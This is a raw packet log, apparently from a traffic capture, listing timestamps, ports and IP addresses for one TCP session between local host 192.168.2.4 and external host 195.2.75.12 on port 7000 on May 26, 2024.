May 26, 2024 01:21:25.526091099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.526323080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.526451111 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.526556969 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.526689053 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.526812077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.527024031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.527280092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.527312994 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.527313948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.527401924 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.527517080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.528024912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.528156996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.528232098 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.528387070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.528454065 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.528780937 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.528908014 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.529176950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.529360056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.529614925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.529742002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.529761076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.529794931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.529917002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.529970884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.530358076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.530527115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.530668020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.531133890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.531194925 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.531255960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.531651974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.531780958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.531845093 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.532018900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.532082081 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.532424927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.532533884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.532567978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.532628059 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.533202887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.533266068 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.534826040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.534859896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.534925938 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.537013054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.537187099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.537303925 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.537373066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.537410975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.537986994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.538057089 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.538067102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.538302898 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.538372040 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.539529085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.539566040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.539643049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.539665937 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.539716959 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.540091991 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.540198088 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.540261984 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.540492058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.540705919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.540883064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.540945053 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.541224957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.541331053 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.541419983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.541635036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.542033911 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.542104006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.542140007 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.542222023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.542269945 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.542814970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.542963028 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.542977095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.543184996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.543441057 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.543674946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.544298887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.544410944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.544487953 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.544640064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.544754028 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.545384884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.545419931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.545454025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.545486927 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.546210051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.546245098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.546278954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.546289921 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.546387911 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.547008038 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.547041893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.547075987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.547161102 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.547652006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.547687054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.547722101 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.547751904 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.547775984 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.548219919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.548237085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.548312902 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.570895910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.570950985 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.571130991 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.571386099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.571449995 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.571590900 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.572156906 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.572316885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.572376966 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.572686911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.572722912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.572783947 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.573409081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.573443890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.573477983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.573513031 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.573730946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.573766947 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.573790073 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.573929071 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.573966980 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.574099064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.574099064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.574155092 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.574652910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.575005054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.575067043 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.575176001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.575895071 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.575911045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.575923920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.576045036 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.576075077 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.576222897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.576257944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.576354980 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.576742887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.576776981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.576836109 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.577305079 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.577490091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.577593088 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.577645063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.578156948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.578294992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.578305006 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.578309059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.578361034 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.578722000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.578757048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.578790903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.578885078 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.579544067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.579579115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.579658985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.579710960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.579771996 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.580243111 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.580317974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.580406904 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.580996037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.581186056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.581310034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.581401110 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.581506968 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.581564903 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.581670046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.581839085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.581902981 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.582330942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.582433939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.582499027 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.582624912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.583093882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.583129883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.583184004 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.583203077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.583573103 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.583861113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.583977938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.584165096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.584228992 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.584647894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.584709883 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.584745884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.584955931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.585014105 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.585417986 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.585764885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.585799932 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.585829020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.585997105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.586092949 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.586119890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.586724997 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.586833000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.586858034 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.587022066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.587086916 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.590554953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.590590954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.590715885 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.624506950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.624701023 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.628550053 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.628833055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.628942966 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.628978968 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.628995895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.629050970 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.629281044 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.629621983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.629695892 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.629760981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.629924059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.630067110 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.631571054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.631964922 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.632072926 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.632117987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.632153034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.632213116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.632261992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.632633924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.632669926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.632778883 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.632802963 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.632837057 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.632858992 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.633080006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.633136034 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.633250952 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.633523941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.633559942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.633614063 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.633826971 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.633986950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.634004116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.634155035 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.634212017 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.634298086 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.635015011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.635049105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.635078907 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.635168076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.635201931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.635251999 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.635327101 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.635364056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.635399103 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.635802031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.635869980 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.635930061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.636413097 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.636471987 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.636538982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.636737108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.636770964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.636805058 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.637341976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.637378931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.637401104 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.637430906 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.637504101 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.637511015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.640847921 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.640984058 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.662090063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.662149906 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.662215948 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.662226915 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.662533045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.662646055 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.662786961 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.662906885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.662997961 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.663597107 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.663635015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.663748026 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.664846897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.664880991 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.664915085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.664952040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.665014982 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.665061951 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.665198088 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.665443897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.665522099 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.665658951 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.665709972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.665842056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.666263103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.666306973 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.666424036 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.666578054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.666790009 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.666825056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.666872025 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.667121887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.667196989 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.667277098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.667310953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.667397976 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.667723894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.667964935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.668159008 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.668309927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.668349028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.668385029 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.668504953 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.668570995 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.668706894 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.668761015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.668936968 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.669043064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.669281960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.669410944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.669539928 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.669586897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.669621944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.669677973 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.669903040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.671044111 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.671080112 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.671113014 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.671113014 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.671366930 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.673266888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.673496962 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.673784971 CEST	7000	49730	195.2.75.12	192.168.2.4
